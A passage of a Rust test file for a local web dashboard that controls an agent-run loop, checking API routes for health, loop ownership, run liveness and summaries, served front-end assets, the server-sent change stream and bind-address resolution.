6767 let missing = f.get("/api/health").await.json();
6768 assert_eq!(missing["daemon"]["running"], false, "no file, no daemon");
6769
6770 write_daemon(
6771 f.home.path(),
6772 Timestamp::now() - jiff::SignedDuration::from_secs(60),
6773 );
6774 let stale = f.get("/api/health").await.json();
6775 assert_eq!(
6776 stale["daemon"]["running"], false,
6777 "a minute without a heartbeat is a dead daemon, not a busy one"
6778 );
6779 assert!(
6780 stale["daemon"]["stale_for_secs"]
6781 .as_i64()
6782 .is_some_and(|s| s >= 55),
6783 "staleness is reported so the UI can say how long: {stale}"
6784 );
6785
6786 write_daemon(f.home.path(), Timestamp::now());
6787 let fresh = f.get("/api/health").await.json();
6788 assert_eq!(fresh["daemon"]["running"], true);
6789 assert_eq!(fresh["daemon"]["idle"], false);
6790 assert_eq!(fresh["daemon"]["pid"], 4242);
6791 assert_eq!(fresh["daemon"]["completed"], 7);
6792 assert_eq!(
6793 fresh["daemon"]["current"][0]["task"],
6794 "20260902-140501-aaaa"
6795 );
6796 assert_eq!(fresh["version"], env!("CARGO_PKG_VERSION"));
6797 }
6798
6799 #[tokio::test]
6800 async fn the_loop_is_not_running_until_something_starts_it() {
6801 let f = Fixture::start().await;
6802
6803 let view = f.get("/api/loop").await.json();
6804 assert_eq!(view["running"], false);
6805 assert_eq!(
6806 view["owned"], false,
6807 "nobody owns a loop that does not exist: {view}"
6808 );
6809 assert_eq!(view["stopping"], false);
6810 assert_eq!(view["last_error"], Value::Null);
6811 assert_eq!(view["daemon"]["running"], false);
6812 assert_eq!(
6813 view["repo"], "/repo/magi",
6814 "the repository a start would use, named before it is started"
6815 );
6816 }
6817
6818 #[tokio::test]
6819 async fn starting_the_loop_runs_it_in_this_process_and_health_says_the_same() {
6820 let f = Fixture::start().await;
6821
6822 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6823 assert_eq!(res.status, 200, "{}", res.body);
6824 let view = res.json();
6825 assert_eq!(view["running"], true);
6826 assert_eq!(
6827 view["owned"], true,
6828 "the loop the UI started is the UI's own to stop: {view}"
6829 );
6830 assert_eq!(
6831 view["merge"],
6832 Value::Null,
6833 "no override was given, so each repository's own config decides"
6834 );
6835
6836 let health = f.get("/api/health").await.json();
6840 assert_eq!(health["loop"]["running"], true, "{health}");
6841 assert_eq!(health["loop"]["owned"], true, "{health}");
6842
6843 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6844 }
6845
6846 #[tokio::test]
6847 async fn a_second_start_is_refused_rather_than_racing_the_first_for_claims() {
6848 let f = Fixture::start().await;
6849 let first = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6850 assert_eq!(first.status, 200, "{}", first.body);
6851
6852 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6853 assert_eq!(
6854 again.status, 409,
6855 "two loops on one queue race for the same claims: {}",
6856 again.body
6857 );
6858 assert!(
6859 again.json()["error"]
6860 .as_str()
6861 .is_some_and(|e| e.contains("already running the loop")),
6862 "the refusal has to say why: {}",
6863 again.body
6864 );
6865 assert_eq!(
6866 f.get("/api/loop").await.json()["running"],
6867 true,
6868 "and the loop that was already running is untouched by it"
6869 );
6870
6871 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6872 }
6873
6874 #[tokio::test]
6875 async fn stopping_answers_at_once_and_the_loop_settles_stopped() {
6876 let f = Fixture::start().await;
6877 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6878
6879 let res = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6880 assert_eq!(
6881 res.status, 200,
6882 "the answer must not wait for the loop: a run in flight is tens of \
6883 minutes and the operator is holding a phone: {}",
6884 res.body
6885 );
6886
6887 let view = settled(&f, |v| v["running"] == false).await;
6888 assert_eq!(view["owned"], false);
6889 assert_eq!(
6890 view["stopping"], false,
6891 "a loop that has stopped is not still stopping: {view}"
6892 );
6893 assert_eq!(
6894 view["last_error"],
6895 Value::Null,
6896 "a loop that was asked to stop did not fail: {view}"
6897 );
6898
6899 let twice = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6902 assert_eq!(twice.status, 200, "{}", twice.body);
6903 }
6904
6905 #[tokio::test]
6906 async fn a_loop_another_process_owns_can_be_neither_started_nor_stopped_here() {
6907 let f = Fixture::start().await;
6908 write_daemon(f.home.path(), Timestamp::now());
6911
6912 let view = f.get("/api/loop").await.json();
6913 assert_eq!(view["running"], false, "not in this process: {view}");
6914 assert_eq!(view["owned"], false, "and not this process's to control");
6915 assert_eq!(
6916 view["daemon"]["running"], true,
6917 "but a loop is alive somewhere, which is what the UI must say"
6918 );
6919 assert_eq!(view["daemon"]["pid"], 4242);
6920
6921 for body in [r#"{"running":true}"#, r#"{"running":false}"#] {
6922 let res = f.post("/api/loop", Some(body)).await;
6923 assert_eq!(
6924 res.status, 409,
6925 "neither button may pretend to work on someone else's loop: {}",
6926 res.body
6927 );
6928 assert!(
6929 res.json()["error"]
6930 .as_str()
6931 .is_some_and(|e| e.contains("4242")),
6932 "the refusal has to name the process the operator must go to: {}",
6933 res.body
6934 );
6935 }
6936 assert_eq!(
6937 f.get("/api/loop").await.json()["running"],
6938 false,
6939 "and the refusal started nothing"
6940 );
6941 }
6942
6943 #[tokio::test]
6944 async fn a_stale_status_file_is_not_a_foreign_owner() {
6945 let f = Fixture::start().await;
6946 write_daemon(
6947 f.home.path(),
6948 Timestamp::now() - jiff::SignedDuration::from_secs(60),
6949 );
6950
6951 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6952 assert_eq!(
6953 res.status, 200,
6954 "a daemon killed a minute ago must not lock the loop out of its \
6955 own home for good: {}",
6956 res.body
6957 );
6958 assert_eq!(res.json()["running"], true);
6959
6960 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6961 }
6962
6963 #[tokio::test]
6964 async fn loop_rev_moves_on_a_start_so_a_phone_learns_without_polling() {
6965 let f = Fixture::start().await;
6966 let before = f.get("/api/health").await.json()["loop_rev"]
6967 .as_u64()
6968 .expect("a loop revision");
6969
6970 f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6971
6972 let after = f.get("/api/health").await.json()["loop_rev"]
6973 .as_u64()
6974 .expect("a loop revision");
6975 assert!(
6976 after > before,
6977 "the loop is in-process state, so this counter is the only thing \
6978 that tells a second device the first one started it: {before} -> \
6979 {after}"
6980 );
6981
6982 f.post("/api/loop", Some(r#"{"running":false}"#)).await;
6983 }
6984
6985 #[tokio::test]
6986 async fn a_loop_that_failed_says_why_and_does_not_read_as_running() {
6987 let f = Fixture::with_loop(launch_broken).await;
6988
6989 let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
6990 assert_eq!(
6991 res.status, 200,
6992 "starting it is not the failure: {}",
6993 res.body
6994 );
6995
6996 let view = settled(&f, |v| v["last_error"].is_string()).await;
6997 assert_eq!(
6998 view["running"], false,
6999 "a loop that died must not read as running, or the operator has \
7000 nothing to press: {view}"
7001 );
7002 assert_eq!(view["owned"], false);
7003 assert!(
7004 view["last_error"]
7005 .as_str()
7006 .is_some_and(|e| e.contains("read-only file system")),
7007 "the phone is where a loop that died at 3am is visible: {view}"
7008 );
7009
7010 let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7013 assert_eq!(again.status, 200, "{}", again.body);
7014 assert_eq!(
7015 again.json()["last_error"],
7016 Value::Null,
7017 "a fresh start does not keep showing why the last one died"
7018 );
7019 }
7020
7021 #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
7033 async fn the_deck_answers_while_it_parks_and_frees_the_address_first() {
7034 let home = TempDir::new().expect("temp home");
7035 let runs = home.path().join("runs");
7036 std::fs::create_dir_all(&runs).expect("runs dir");
7037 let ui = Ui::new(
7038 Queue::at(home.path().join("queue")),
7039 Questions::at(home.path().join("questions")),
7040 Talks::at(home.path().join("talks")),
7041 runs,
7042 home.path().to_path_buf(),
7043 PathBuf::from("/repo/magi"),
7044 )
7045 .with_worktrees_root(home.path().join("wt"))
7046 .with_launch(launch_knocking_on_the_way_out);
7047 let looping = ui.looping();
7048 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
7049 .await
7050 .expect("bind loopback");
7051 let addr = listener.local_addr().expect("local addr");
7052 *PARK_KNOCK.lock().expect("park knock") = Some(addr);
7053 let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
7054
7055 let started = request(addr, "POST", "/api/loop", Some(r#"{"running":true}"#)).await;
7056 assert_eq!(started.status, 200, "the loop starts: {}", started.body);
7057
7058 let bound = std::sync::Mutex::new(None);
7073 hand_over(home.path(), &looping, served, || {
7074 let deadline = std::time::Instant::now() + std::time::Duration::from_secs(5);
7075 let attempt = loop {
7076 match std::net::TcpListener::bind(addr) {
7077 Ok(l) => {
7078 drop(l);
7079 break Ok(());
7080 }
7081 Err(e)
7082 if e.kind() == std::io::ErrorKind::AddrInUse
7083 && std::time::Instant::now() < deadline =>
7084 {
7085 std::thread::sleep(std::time::Duration::from_millis(10));
7086 }
7087 Err(e) => break Err(e.to_string()),
7088 }
7089 };
7090 *bound.lock().expect("bound") = Some(attempt);
7091 Ok(())
7092 })
7093 .await
7094 .expect("hand over");
7095
7096 assert_eq!(
7097 *PARK_HEARD.lock().expect("park heard"),
7098 Some(200),
7099 "the deck must answer while the loop is parking"
7100 );
7101 let attempt = bound
7102 .lock()
7103 .expect("bound")
7104 .take()
7105 .expect("the successor was started");
7106 assert!(
7107 attempt.is_ok(),
7108 "and the address must be free by the time it is: {attempt:?}"
7109 );
7110 }
7111
7112 #[tokio::test]
7113 async fn a_newer_daemon_status_file_still_renders() {
7114 let f = Fixture::start().await;
7115 std::fs::write(
7118 f.home.path().join("daemon.json"),
7119 serde_json::json!({
7120 "schema": 2,
7121 "updated_at": Timestamp::now().to_string(),
7122 "idle": true,
7123 "surprise": { "nested": [1, 2, 3] },
7124 })
7125 .to_string(),
7126 )
7127 .expect("write daemon.json");
7128
7129 let health = f.get("/api/health").await;
7130
7131 assert_eq!(health.status, 200);
7132 assert_eq!(health.json()["daemon"]["running"], true);
7133 }
7134
7135 #[tokio::test]
7136 async fn a_corrupt_run_is_skipped_in_the_list_and_explained_on_its_own_route() {
7137 let f = Fixture::start().await;
7138 write_run(&f.runs(), "20260902-140501-good", RunStatus::Ready);
7139 let broken = f.runs().join("20260902-140502-bad");
7140 std::fs::create_dir_all(&broken).expect("run dir");
7141 std::fs::write(broken.join("run.json"), "{ truncated").expect("write run.json");
7142
7143 let list = f.get("/api/runs").await;
7144 let detail = f.get("/api/runs/20260902-140502-bad").await;
7145
7146 assert_eq!(list.status, 200);
7147 let listed = list.json();
7148 let ids: Vec<&str> = listed
7149 .as_array()
7150 .expect("an array")
7151 .iter()
7152 .map(|r| r["id"].as_str().expect("an id"))
7153 .collect();
7154 assert_eq!(
7155 ids,
7156 vec!["20260902-140501-good"],
7157 "one unreadable run must not cost the operator the whole history"
7158 );
7159 assert_eq!(detail.status, 500);
7160 assert!(
7161 detail.json()["error"]
7162 .as_str()
7163 .is_some_and(|e| e.contains("run.json")),
7164 "the failure names the file to look at: {}",
7165 detail.body
7166 );
7167 let health = f.get("/api/health").await;
7171 assert_eq!(health.json()["runs_unreadable"], 1);
7172 }
7173
7174 #[tokio::test]
7175 async fn a_run_is_summarised_for_the_list_and_served_whole_on_its_own_route() {
7176 let f = Fixture::start().await;
7177 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Ready);
7178
7179 let summary = f.get("/api/runs").await.json();
7180 let row = &summary[0];
7181 assert_eq!(row["short"], "a1b2");
7182 assert_eq!(row["status"], "ready");
7183 assert_eq!(row["done"], true);
7184 assert_eq!(row["title"], "Add a web UI");
7185 assert_eq!(row["repo_name"], "magi");
7186 assert_eq!(row["judges"], 3);
7187 assert_eq!(row["winner"], Value::Null);
7188 assert_eq!(row["reviews"], 0);
7189
7190 let detail = f.get("/api/runs/a1b2").await;
7193 assert_eq!(detail.status, 200);
7194 assert_eq!(detail.json()["base_branch"], "main");
7195 assert_eq!(detail.json()["id"], "20260902-140501-a1b2");
7196 }
7197
7198 #[tokio::test]
7206 async fn a_mode_none_ready_run_is_flagged_unmerged_by_design_everywhere() {
7207 let f = Fixture::start().await;
7208
7209 let mut none_run = RunState::new(
7210 PathBuf::from("/repo/magi"),
7211 "main".to_owned(),
7212 "0123456789abcdef".to_owned(),
7213 "Add a web UI".to_owned(),
7214 Config::default(),
7215 );
7216 none_run.id = "20260902-140503-none".to_owned();
7217 none_run.status = RunStatus::Ready;
7218 none_run.merge = Some(crate::run::MergeOutcome {
7219 mode: crate::config::MergeMode::None,
7220 ok: true,
7221 detail: "git -C /repo merge --no-ff magi/x/A".to_owned(),
7222 });
7223 write_state(&f.runs(), &none_run);
7224
7225 let mut pr_run = RunState::new(
7226 PathBuf::from("/repo/magi"),
7227 "main".to_owned(),
7228 "0123456789abcdef".to_owned(),
7229 "Add a web UI".to_owned(),
7230 Config::default(),
7231 );
7232 pr_run.id = "20260902-140504-prcl".to_owned();
7233 pr_run.status = RunStatus::Ready;
7234 pr_run.merge = Some(crate::run::MergeOutcome {
7235 mode: crate::config::MergeMode::Pr,
7236 ok: false,
7237 detail: "https://example.com/pr/1 was closed without merging".to_owned(),
7238 });
7239 write_state(&f.runs(), &pr_run);
7240
7241 let summary = f.get("/api/runs").await.json();
7242 let rows: std::collections::HashMap<&str, &Value> = summary
7243 .as_array()
7244 .expect("an array")
7245 .iter()
7246 .map(|r| (r["id"].as_str().expect("an id"), r))
7247 .collect();
7248 assert_eq!(rows[none_run.id.as_str()]["status"], "ready");
7249 assert_eq!(
7250 rows[none_run.id.as_str()]["unmerged_by_design"],
7251 true,
7252 "a mode-none Ready must be flagged in the list"
7253 );
7254 assert_eq!(
7255 rows[pr_run.id.as_str()]["unmerged_by_design"],
7256 false,
7257 "a Ready reached by a closed pull request is a different case"
7258 );
7259
7260 let none_detail = f.get(&format!("/api/runs/{}", none_run.id)).await.json();
7261 assert_eq!(none_detail["status"], "ready");
7262 assert_eq!(none_detail["unmerged_by_design"], true);
7263
7264 let pr_detail = f.get(&format!("/api/runs/{}", pr_run.id)).await.json();
7265 assert_eq!(pr_detail["unmerged_by_design"], false);
7266 }
7267
7268 #[tokio::test]
7273 async fn run_detail_reports_active_seats_and_whether_a_daemon_confirms_them() {
7274 let f = Fixture::start().await;
7275 let id = "20260902-140502-bbbb";
7279 let mut state = RunState::new(
7280 PathBuf::from("/repo/magi"),
7281 "main".to_owned(),
7282 "0123456789abcdef".to_owned(),
7283 "Add a web UI".to_owned(),
7284 Config::default(),
7285 );
7286 state.id = id.to_owned();
7287 state.status = RunStatus::Judging;
7288 state.seat_started("judge", "judge-2", std::time::Duration::from_secs(120), 0);
7289 let dir = f.runs().join(id);
7290 std::fs::create_dir_all(&dir).expect("run dir");
7291 std::fs::write(
7292 dir.join("run.json"),
7293 serde_json::to_string_pretty(&state).expect("serialize run"),
7294 )
7295 .expect("write run.json");
7296
7297 let cold = f.get(&format!("/api/runs/{id}")).await.json();
7303 assert_eq!(cold["active"]["judge-2"]["node"], "judge");
7304 assert_eq!(cold["live"], "unknown", "{cold}");
7305
7306 write_daemon(f.home.path(), Timestamp::now());
7309 let warm = f.get(&format!("/api/runs/{id}")).await.json();
7310 assert_eq!(warm["live"], "live", "{warm}");
7311 }
7312
7313 #[tokio::test]
7320 async fn run_detail_reads_a_manual_run_with_a_live_driver_pid_as_live_without_a_daemon() {
7321 let f = Fixture::start().await;
7322 let id = "20260922-090000-cccc";
7323 let mut state = RunState::new(
7324 PathBuf::from("/repo/magi"),
7325 "main".to_owned(),
7326 "0123456789abcdef".to_owned(),
7327 "Review only".to_owned(),
7328 Config::default(),
7329 );
7330 state.id = id.to_owned();
7331 state.status = RunStatus::Reviewing;
7332 state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7333 state.driver_pid = Some(std::process::id());
7339 state.driver_started_at = Some(
7340 crate::proc::process_started_at(std::process::id())
7341 .expect("this test process's own start time must be queryable"),
7342 );
7343 let dir = f.runs().join(id);
7344 std::fs::create_dir_all(&dir).expect("run dir");
7345 std::fs::write(
7346 dir.join("run.json"),
7347 serde_json::to_string_pretty(&state).expect("serialize run"),
7348 )
7349 .expect("write run.json");
7350
7351 let detail = f.get(&format!("/api/runs/{id}")).await.json();
7352 assert_eq!(detail["live"], "live", "{detail}");
7353 }
7354
7355 #[tokio::test]
7361 async fn run_detail_reads_a_live_pid_as_dead_once_its_start_time_no_longer_matches() {
7362 let f = Fixture::start().await;
7363 let id = "20260922-090100-dddd";
7364 let mut state = RunState::new(
7365 PathBuf::from("/repo/magi"),
7366 "main".to_owned(),
7367 "0123456789abcdef".to_owned(),
7368 "Review only".to_owned(),
7369 Config::default(),
7370 );
7371 state.id = id.to_owned();
7372 state.status = RunStatus::Reviewing;
7373 state.seat_started("review", "review-1", std::time::Duration::from_secs(120), 0);
7374 state.driver_pid = Some(std::process::id());
7379 state.driver_started_at = Some("not-this-processes-real-start-time".to_owned());
7380 let dir = f.runs().join(id);
7381 std::fs::create_dir_all(&dir).expect("run dir");
7382 std::fs::write(
7383 dir.join("run.json"),
7384 serde_json::to_string_pretty(&state).expect("serialize run"),
7385 )
7386 .expect("write run.json");
7387
7388 let detail = f.get(&format!("/api/runs/{id}")).await.json();
7389 assert_eq!(detail["live"], "dead", "{detail}");
7390 }
7391
7392 #[test]
7396 fn summarize_asks_about_each_pid_once_and_keeps_the_row_meaning() {
7397 let mk = |id: &str, pid: Option<u32>| {
7398 let mut s = RunState::new(
7399 PathBuf::from("/repo/magi"),
7400 "main".to_owned(),
7401 "0123456789abcdef".to_owned(),
7402 "Add a web UI".to_owned(),
7403 Config::default(),
7404 );
7405 s.id = id.to_owned();
7406 s.driver_pid = pid;
7407 s.driver_started_at = Some("t0".to_owned());
7408 s
7409 };
7410 let states = vec![
7411 mk("20260902-140502-aaaa", Some(77)),
7412 mk("20260902-140502-bbbb", Some(77)),
7413 mk("20260902-140502-cccc", Some(77)),
7414 mk("20260902-140502-dddd", None),
7415 ];
7416 let open: HashSet<String> = ["20260902-140502-bbbb".to_owned()].into();
7417 let claimed: HashSet<String> = ["20260902-140502-dddd".to_owned()].into();
7418 let sup: HashMap<String, String> = [(
7419 "20260902-140502-aaaa".to_owned(),
7420 "20260902-140502-cccc".to_owned(),
7421 )]
7422 .into();
7423
7424 let status_calls = std::cell::Cell::new(0);
7425 let identity_calls = std::cell::Cell::new(0);
7426 let probe = std::cell::RefCell::new(crate::proc::ProcProbe::new(
7427 |_| {
7428 status_calls.set(status_calls.get() + 1);
7429 Some(true)
7430 },
7431 |_| {
7432 identity_calls.set(identity_calls.get() + 1);
7433 Some("t0".to_owned())
7434 },
7435 ));
7436 let rows = summarize(
7437 states,
7438 &open,
7439 &claimed,
7440 &sup,
7441 |p| probe.borrow_mut().status(p),
7442 |p| probe.borrow_mut().started_at(p),
7443 );
7444
7445 assert_eq!(status_calls.get(), 1, "one pid, one status query");
7446 assert_eq!(identity_calls.get(), 1, "one pid, one identity query");
7447 assert_eq!(rows.len(), 4);
7448 assert!(!rows[0].waiting && rows[1].waiting);
7449 assert_eq!(rows[0].live, crate::run::Liveness::Live);
7450 assert_eq!(rows[3].live, crate::run::Liveness::Live, "claim alone");
7451 assert_eq!(rows[0].superseded_by.as_deref(), Some("cccc"));
7452 assert_eq!(rows[1].superseded_by, None);
7453 }
7454
7455 #[test]
7456 fn run_list_exposes_a_confirmed_dead_driver_for_stale_presentation() {
7457 let mut state = RunState::new(
7458 PathBuf::from("/repo/magi"),
7459 "main".to_owned(),
7460 "0123456789abcdef".to_owned(),
7461 "Review only".to_owned(),
7462 Config::default(),
7463 );
7464 state.id = "20260922-090200-dead".to_owned();
7465 state.status = RunStatus::Reviewing;
7466 let row = serde_json::to_value(RunSummary::of(&state, false, crate::run::Liveness::Dead))
7467 .expect("serialize list row");
7468 assert_eq!(row["status"], "reviewing");
7469 assert_eq!(row["live"], "dead", "{row}");
7470 assert!(!row["done"].as_bool().unwrap());
7471 }
7472
7473 #[tokio::test]
7474 async fn the_run_list_is_newest_first_and_honours_a_limit() {
7475 let f = Fixture::start().await;
7476 for id in [
7477 "20260902-140501-aaaa",
7478 "20260902-140502-bbbb",
7479 "20260902-140503-cccc",
7480 ] {
7481 write_run(&f.runs(), id, RunStatus::Merged);
7482 }
7483
7484 let all = f.get("/api/runs").await.json();
7485 let capped = f.get("/api/runs?limit=2").await.json();
7486
7487 assert_eq!(all[0]["id"], "20260902-140503-cccc");
7488 assert_eq!(all.as_array().map(Vec::len), Some(3));
7489 assert_eq!(capped.as_array().map(Vec::len), Some(2));
7490 assert_eq!(capped[0]["id"], "20260902-140503-cccc");
7491 }
7492
7493 #[tokio::test]
7494 async fn the_report_route_serves_the_terminal_report_as_plain_text() {
7495 let f = Fixture::start().await;
7496 write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Blocked);
7497
7498 let res = f.get("/api/runs/20260902-140501-a1b2/report").await;
7499
7500 assert_eq!(res.status, 200);
7501 assert!(
7502 res.headers
7503 .contains("content-type: text/plain; charset=utf-8"),
7504 "a browser must render it, not download it: {}",
7505 res.headers
7506 );
7507 assert!(
7511 res.body.contains("20260902-140501-a1b2"),
7512 "the report is about the run that was asked for: {}",
7513 res.body
7514 );
7515 }
7516
7517 #[tokio::test]
7518 async fn the_front_end_is_served_from_the_binary_with_types_a_phone_renders() {
7519 let f = Fixture::start().await;
7520
7521 let html = f.get("/").await;
7522 let css = f.get("/app.css").await;
7523 let js = f.get("/app.js").await;
7524
7525 assert_eq!((html.status, css.status, js.status), (200, 200, 200));
7526 assert!(
7527 html.headers
7528 .contains("content-type: text/html; charset=utf-8")
7529 );
7530 assert!(css.headers.contains("content-type: text/css"));
7531 assert!(js.headers.contains("content-type: text/javascript"));
7532 assert_eq!(html.body, INDEX_HTML, "compiled in, never read from disk");
7533 }
7534
7535 #[test]
7536 fn review_rounds_label_a_distinct_verified_head() {
7537 assert!(APP_JS.contains("round.verified_head"));
7538 assert!(APP_JS.contains("verified HEAD"));
7539 assert!(APP_JS.contains("verified ${String(round.verified_head).slice(0, 7)}"));
7540 }
7541
7542 #[test]
7543 fn queue_ui_presents_blocked_dependencies_and_resolved_questions() {
7544 assert!(APP_JS.contains("blocked: { glyph:"));
7548 assert!(APP_JS.contains("Blocked. Waiting on another task or question to resolve."));
7549
7550 assert!(APP_JS.contains("function classifyBlockedBy(blockedBy, tasksById, questionsById)"));
7554 assert!(
7555 APP_JS.contains(
7556 "if (parts.length) noteText = `${noteText} Waiting on ${parts.join(\" and \")}.`;"
7557 ),
7558 "the note line must name what a blocked task is waiting on, not just that it is blocked"
7559 );
7560 assert!(APP_JS.contains("if (status === \"blocked\") {"));
7564
7565 assert!(APP_JS.contains("function depNode(id, byId, questionNodes)"));
7569 assert!(APP_JS.contains("questionNodes.set(dep, questionsById.get(dep));"));
7570 assert!(
7571 APP_JS.contains("location.hash = \"#/questions\";"),
7572 "a question node must jump to the Questions screen, not pretend to be a task"
7573 );
7574
7575 assert!(APP_JS.contains("Resolved questions"));
7578 assert!(APP_JS.contains("r.answersList.append("));
7579 assert!(APP_CSS.contains(".task-answers"));
7580 }
7581
7582 #[test]
7583 fn a_task_notification_links_to_its_own_card_not_the_bare_backlog() {
7584 assert!(
7589 APP_JS.contains(
7590 "el(\"a\", { href: `#/queue/${encodeURIComponent(link.id)}`, text: `Task ${shortId(link.id)}` })"
7591 ),
7592 "a task notice's link must carry the task id into the hash, not just name the Backlog screen"
7593 );
7594 assert!(
7595 !APP_JS.contains("el(\"a\", { href: \"#/queue\", text: `Task ${shortId(link.id)}` })"),
7596 "regression: the task link must not go back to naming the bare Backlog route"
7597 );
7598
7599 assert!(
7602 APP_JS.contains(
7603 "if (parts[0] === \"queue\" && parts[1]) return { name: \"queue\", id: decodeURIComponent(parts[1]) };"
7604 ),
7605 "`#/queue/<id>` must parse into a route carrying that id"
7606 );
7607
7608 assert!(APP_JS.contains("state.queueFocus = route.id;"));
7612 assert!(APP_JS.contains("function consumeQueueFocus()"));
7613 assert!(APP_JS.contains("jumpToTask(id);"));
7614 }
7615
7616 #[test]
7617 fn consuming_a_queue_focus_survives_clearing_a_stale_backlog_search() {
7618 assert!(
7627 APP_JS.contains(
7628 " if (!id || state.queue === null) return;\n if (state.queueSearch.trim() !== \"\") {"
7629 ),
7630 "the search-clearing branch must run before state.queueFocus is cleared, or the \
7631 recursive renderQueue() call has nothing left to jump to"
7632 );
7633 assert!(
7634 APP_JS.contains("state.queueFocus = null;\n jumpToTask(id);"),
7635 "state.queueFocus must be cleared immediately before the jump it guards, not earlier"
7636 );
7637 }
7638
7639 #[test]
7640 fn a_notification_card_navigates_from_anywhere_on_it_not_just_its_link_text() {
7641 assert!(
7649 APP_JS.contains(
7650 "onclick: link ? (event) => { if (!event.target.closest(\"a, button\")) link.click(); } : null"
7651 ),
7652 "the notice card itself must forward a tap outside its link/buttons to the link's own click"
7653 );
7654 }
7655
7656 #[test]
7657 fn review_rounds_tell_a_stale_verification_and_a_resource_block_apart_from_a_real_result() {
7658 assert!(
7659 APP_JS.contains("round.verified_head !== round.head"),
7660 "a round that verified an earlier commit must be visibly distinct from one that \
7661 verified the head reviewers are looking at now"
7662 );
7663 assert!(
7664 APP_JS.contains("round.verified_at"),
7665 "when a check ran must be on the wire, not just which commit"
7666 );
7667 assert!(
7668 APP_JS.contains("resource_blocked"),
7669 "a command magi never got to run (shared build cache contention) must not render \
7670 the same as a command that ran and failed"
7671 );
7672 }
7673
7674 #[tokio::test]
7675 async fn the_change_stream_announces_the_current_revisions_on_connect() {
7676 let f = Fixture::start().await;
7677
7678 let mut socket = tokio::net::TcpStream::connect(f.addr)
7679 .await
7680 .expect("connect");
7681 socket
7682 .write_all(
7683 b"GET /api/events HTTP/1.1\r\nHost: magi\r\nAccept: text/event-stream\r\n\r\n",
7684 )
7685 .await
7686 .expect("write request");
7687
7688 let mut seen = String::new();
7691 let mut buf = [0u8; 1024];
7692 while !seen.contains("event: change") {
7693 let read = tokio::time::timeout(Duration::from_secs(5), socket.read(&mut buf))
7694 .await
7695 .expect("the stream must speak within five seconds")
7696 .expect("read");
7697 assert!(read > 0, "the server closed the change stream: {seen}");
7698 seen.push_str(&String::from_utf8_lossy(&buf[..read]));
7699 }
7700
7701 assert!(
7702 seen.to_lowercase()
7703 .contains("content-type: text/event-stream"),
7704 "the browser only reconnects automatically for a real SSE stream: {seen}"
7705 );
7706 let data = seen
7707 .lines()
7708 .find_map(|l| l.strip_prefix("data:"))
7709 .expect("a data line");
7710 let payload: Value = serde_json::from_str(data.trim()).expect("json payload");
7711 assert!(
7712 payload["queue_rev"].is_u64()
7713 && payload["runs_rev"].is_u64()
7714 && payload["questions_rev"].is_u64()
7715 && payload["talks_rev"].is_u64()
7716 && payload["notifications_rev"].is_u64()
7717 && payload["loop_rev"].is_u64(),
7718 "the client needs one revision per store to know what to refetch, \
7719 and `talks_rev` is the only notification a standing talk gets - a \
7720 phone whose radio slept through a turn learns about it here, as \
7721 does one whose operator started the loop from another device: \
7722 {payload}"
7723 );
7724
7725 let health = f.get("/api/health").await.json();
7732 for key in [
7733 "queue_rev",
7734 "runs_rev",
7735 "questions_rev",
7736 "talks_rev",
7737 "notifications_rev",
7738 "loop_rev",
7739 ] {
7740 assert!(
7741 health[key].is_u64(),
7742 "health is the change stream's fallback and is missing `{key}`: {health}"
7743 );
7744 }
7745 }
7746
7747 #[tokio::test]
7748 async fn a_new_turn_on_a_talk_moves_the_change_stream_revision() {
7749 let f = Fixture::start().await;
7750 let before = f.get("/api/health").await.json()["talks_rev"]
7751 .as_u64()
7752 .expect("talks_rev");
7753
7754 let talk = seed_talk(&f, "20260904-014455-ab12", "open");
7755 std::thread::sleep(Duration::from_millis(10));
7756 let mut on_disk = f.talks().get(&talk).expect("get seeded talk");
7757 on_disk.turns.push(crate::talk::Turn {
7758 who: crate::talk::Who::Operator,
7759 body: "a new turn".to_owned(),
7760 at: Timestamp::now(),
7761 attachments: Vec::new(),
7762 });
7763 f.talks().put(&mut on_disk).expect("record a turn");
7764
7765 let after = f.get("/api/health").await.json()["talks_rev"]
7766 .as_u64()
7767 .expect("talks_rev");
7768 assert_ne!(
7769 before, after,
7770 "a phone must be able to notice a talk's reply without polling every store"
7771 );
7772 }
7773
7774 #[test]
7775 fn bind_reads_back_from_the_spelling_the_cli_prints() {
7776 for bind in [Bind::Auto, Bind::Addr(IpAddr::V4(Ipv4Addr::LOCALHOST))] {
7780 assert_eq!(bind.to_string().parse::<Bind>(), Ok(bind));
7781 }
7782 assert_eq!("AUTO".parse::<Bind>(), Ok(Bind::Auto));
7783 assert!("everywhere".parse::<Bind>().is_err());
7784 }
7785
7786 #[test]
7787 fn an_explicit_bind_address_is_taken_verbatim() {
7788 let asked = IpAddr::V4(Ipv4Addr::new(192, 168, 1, 20));
7789
7790 let (addr, warning) = resolve_bind(&Bind::Addr(asked));
7791
7792 assert_eq!(addr, asked);
7793 assert!(
7794 warning.is_none(),
7795 "an operator who named an address gets no lecture"
7796 );
7797 }
7798
7799 #[test]
7800 fn bind_auto_either_finds_a_tailnet_address_or_says_the_ui_is_local_only() {
7801 let (addr, warning) = resolve_bind(&Bind::Auto);
7802
7803 match addr {
7810 IpAddr::V4(ip) if is_tailnet(&ip) => {
7811 assert!(warning.is_none(), "a tailnet address needs no warning");
7812 }
7813 other => {
7814 assert_eq!(other, IpAddr::V4(Ipv4Addr::LOCALHOST));
7815 let warning = warning.expect("a fallback has to explain itself");
7816 assert!(
7817 warning.contains("127.0.0.1") && warning.contains("local-only"),
7818 "the warning says what happened and what it costs: {warning}"
7819 );
7820 }
7821 }
7822 }
7823
7824 #[test]
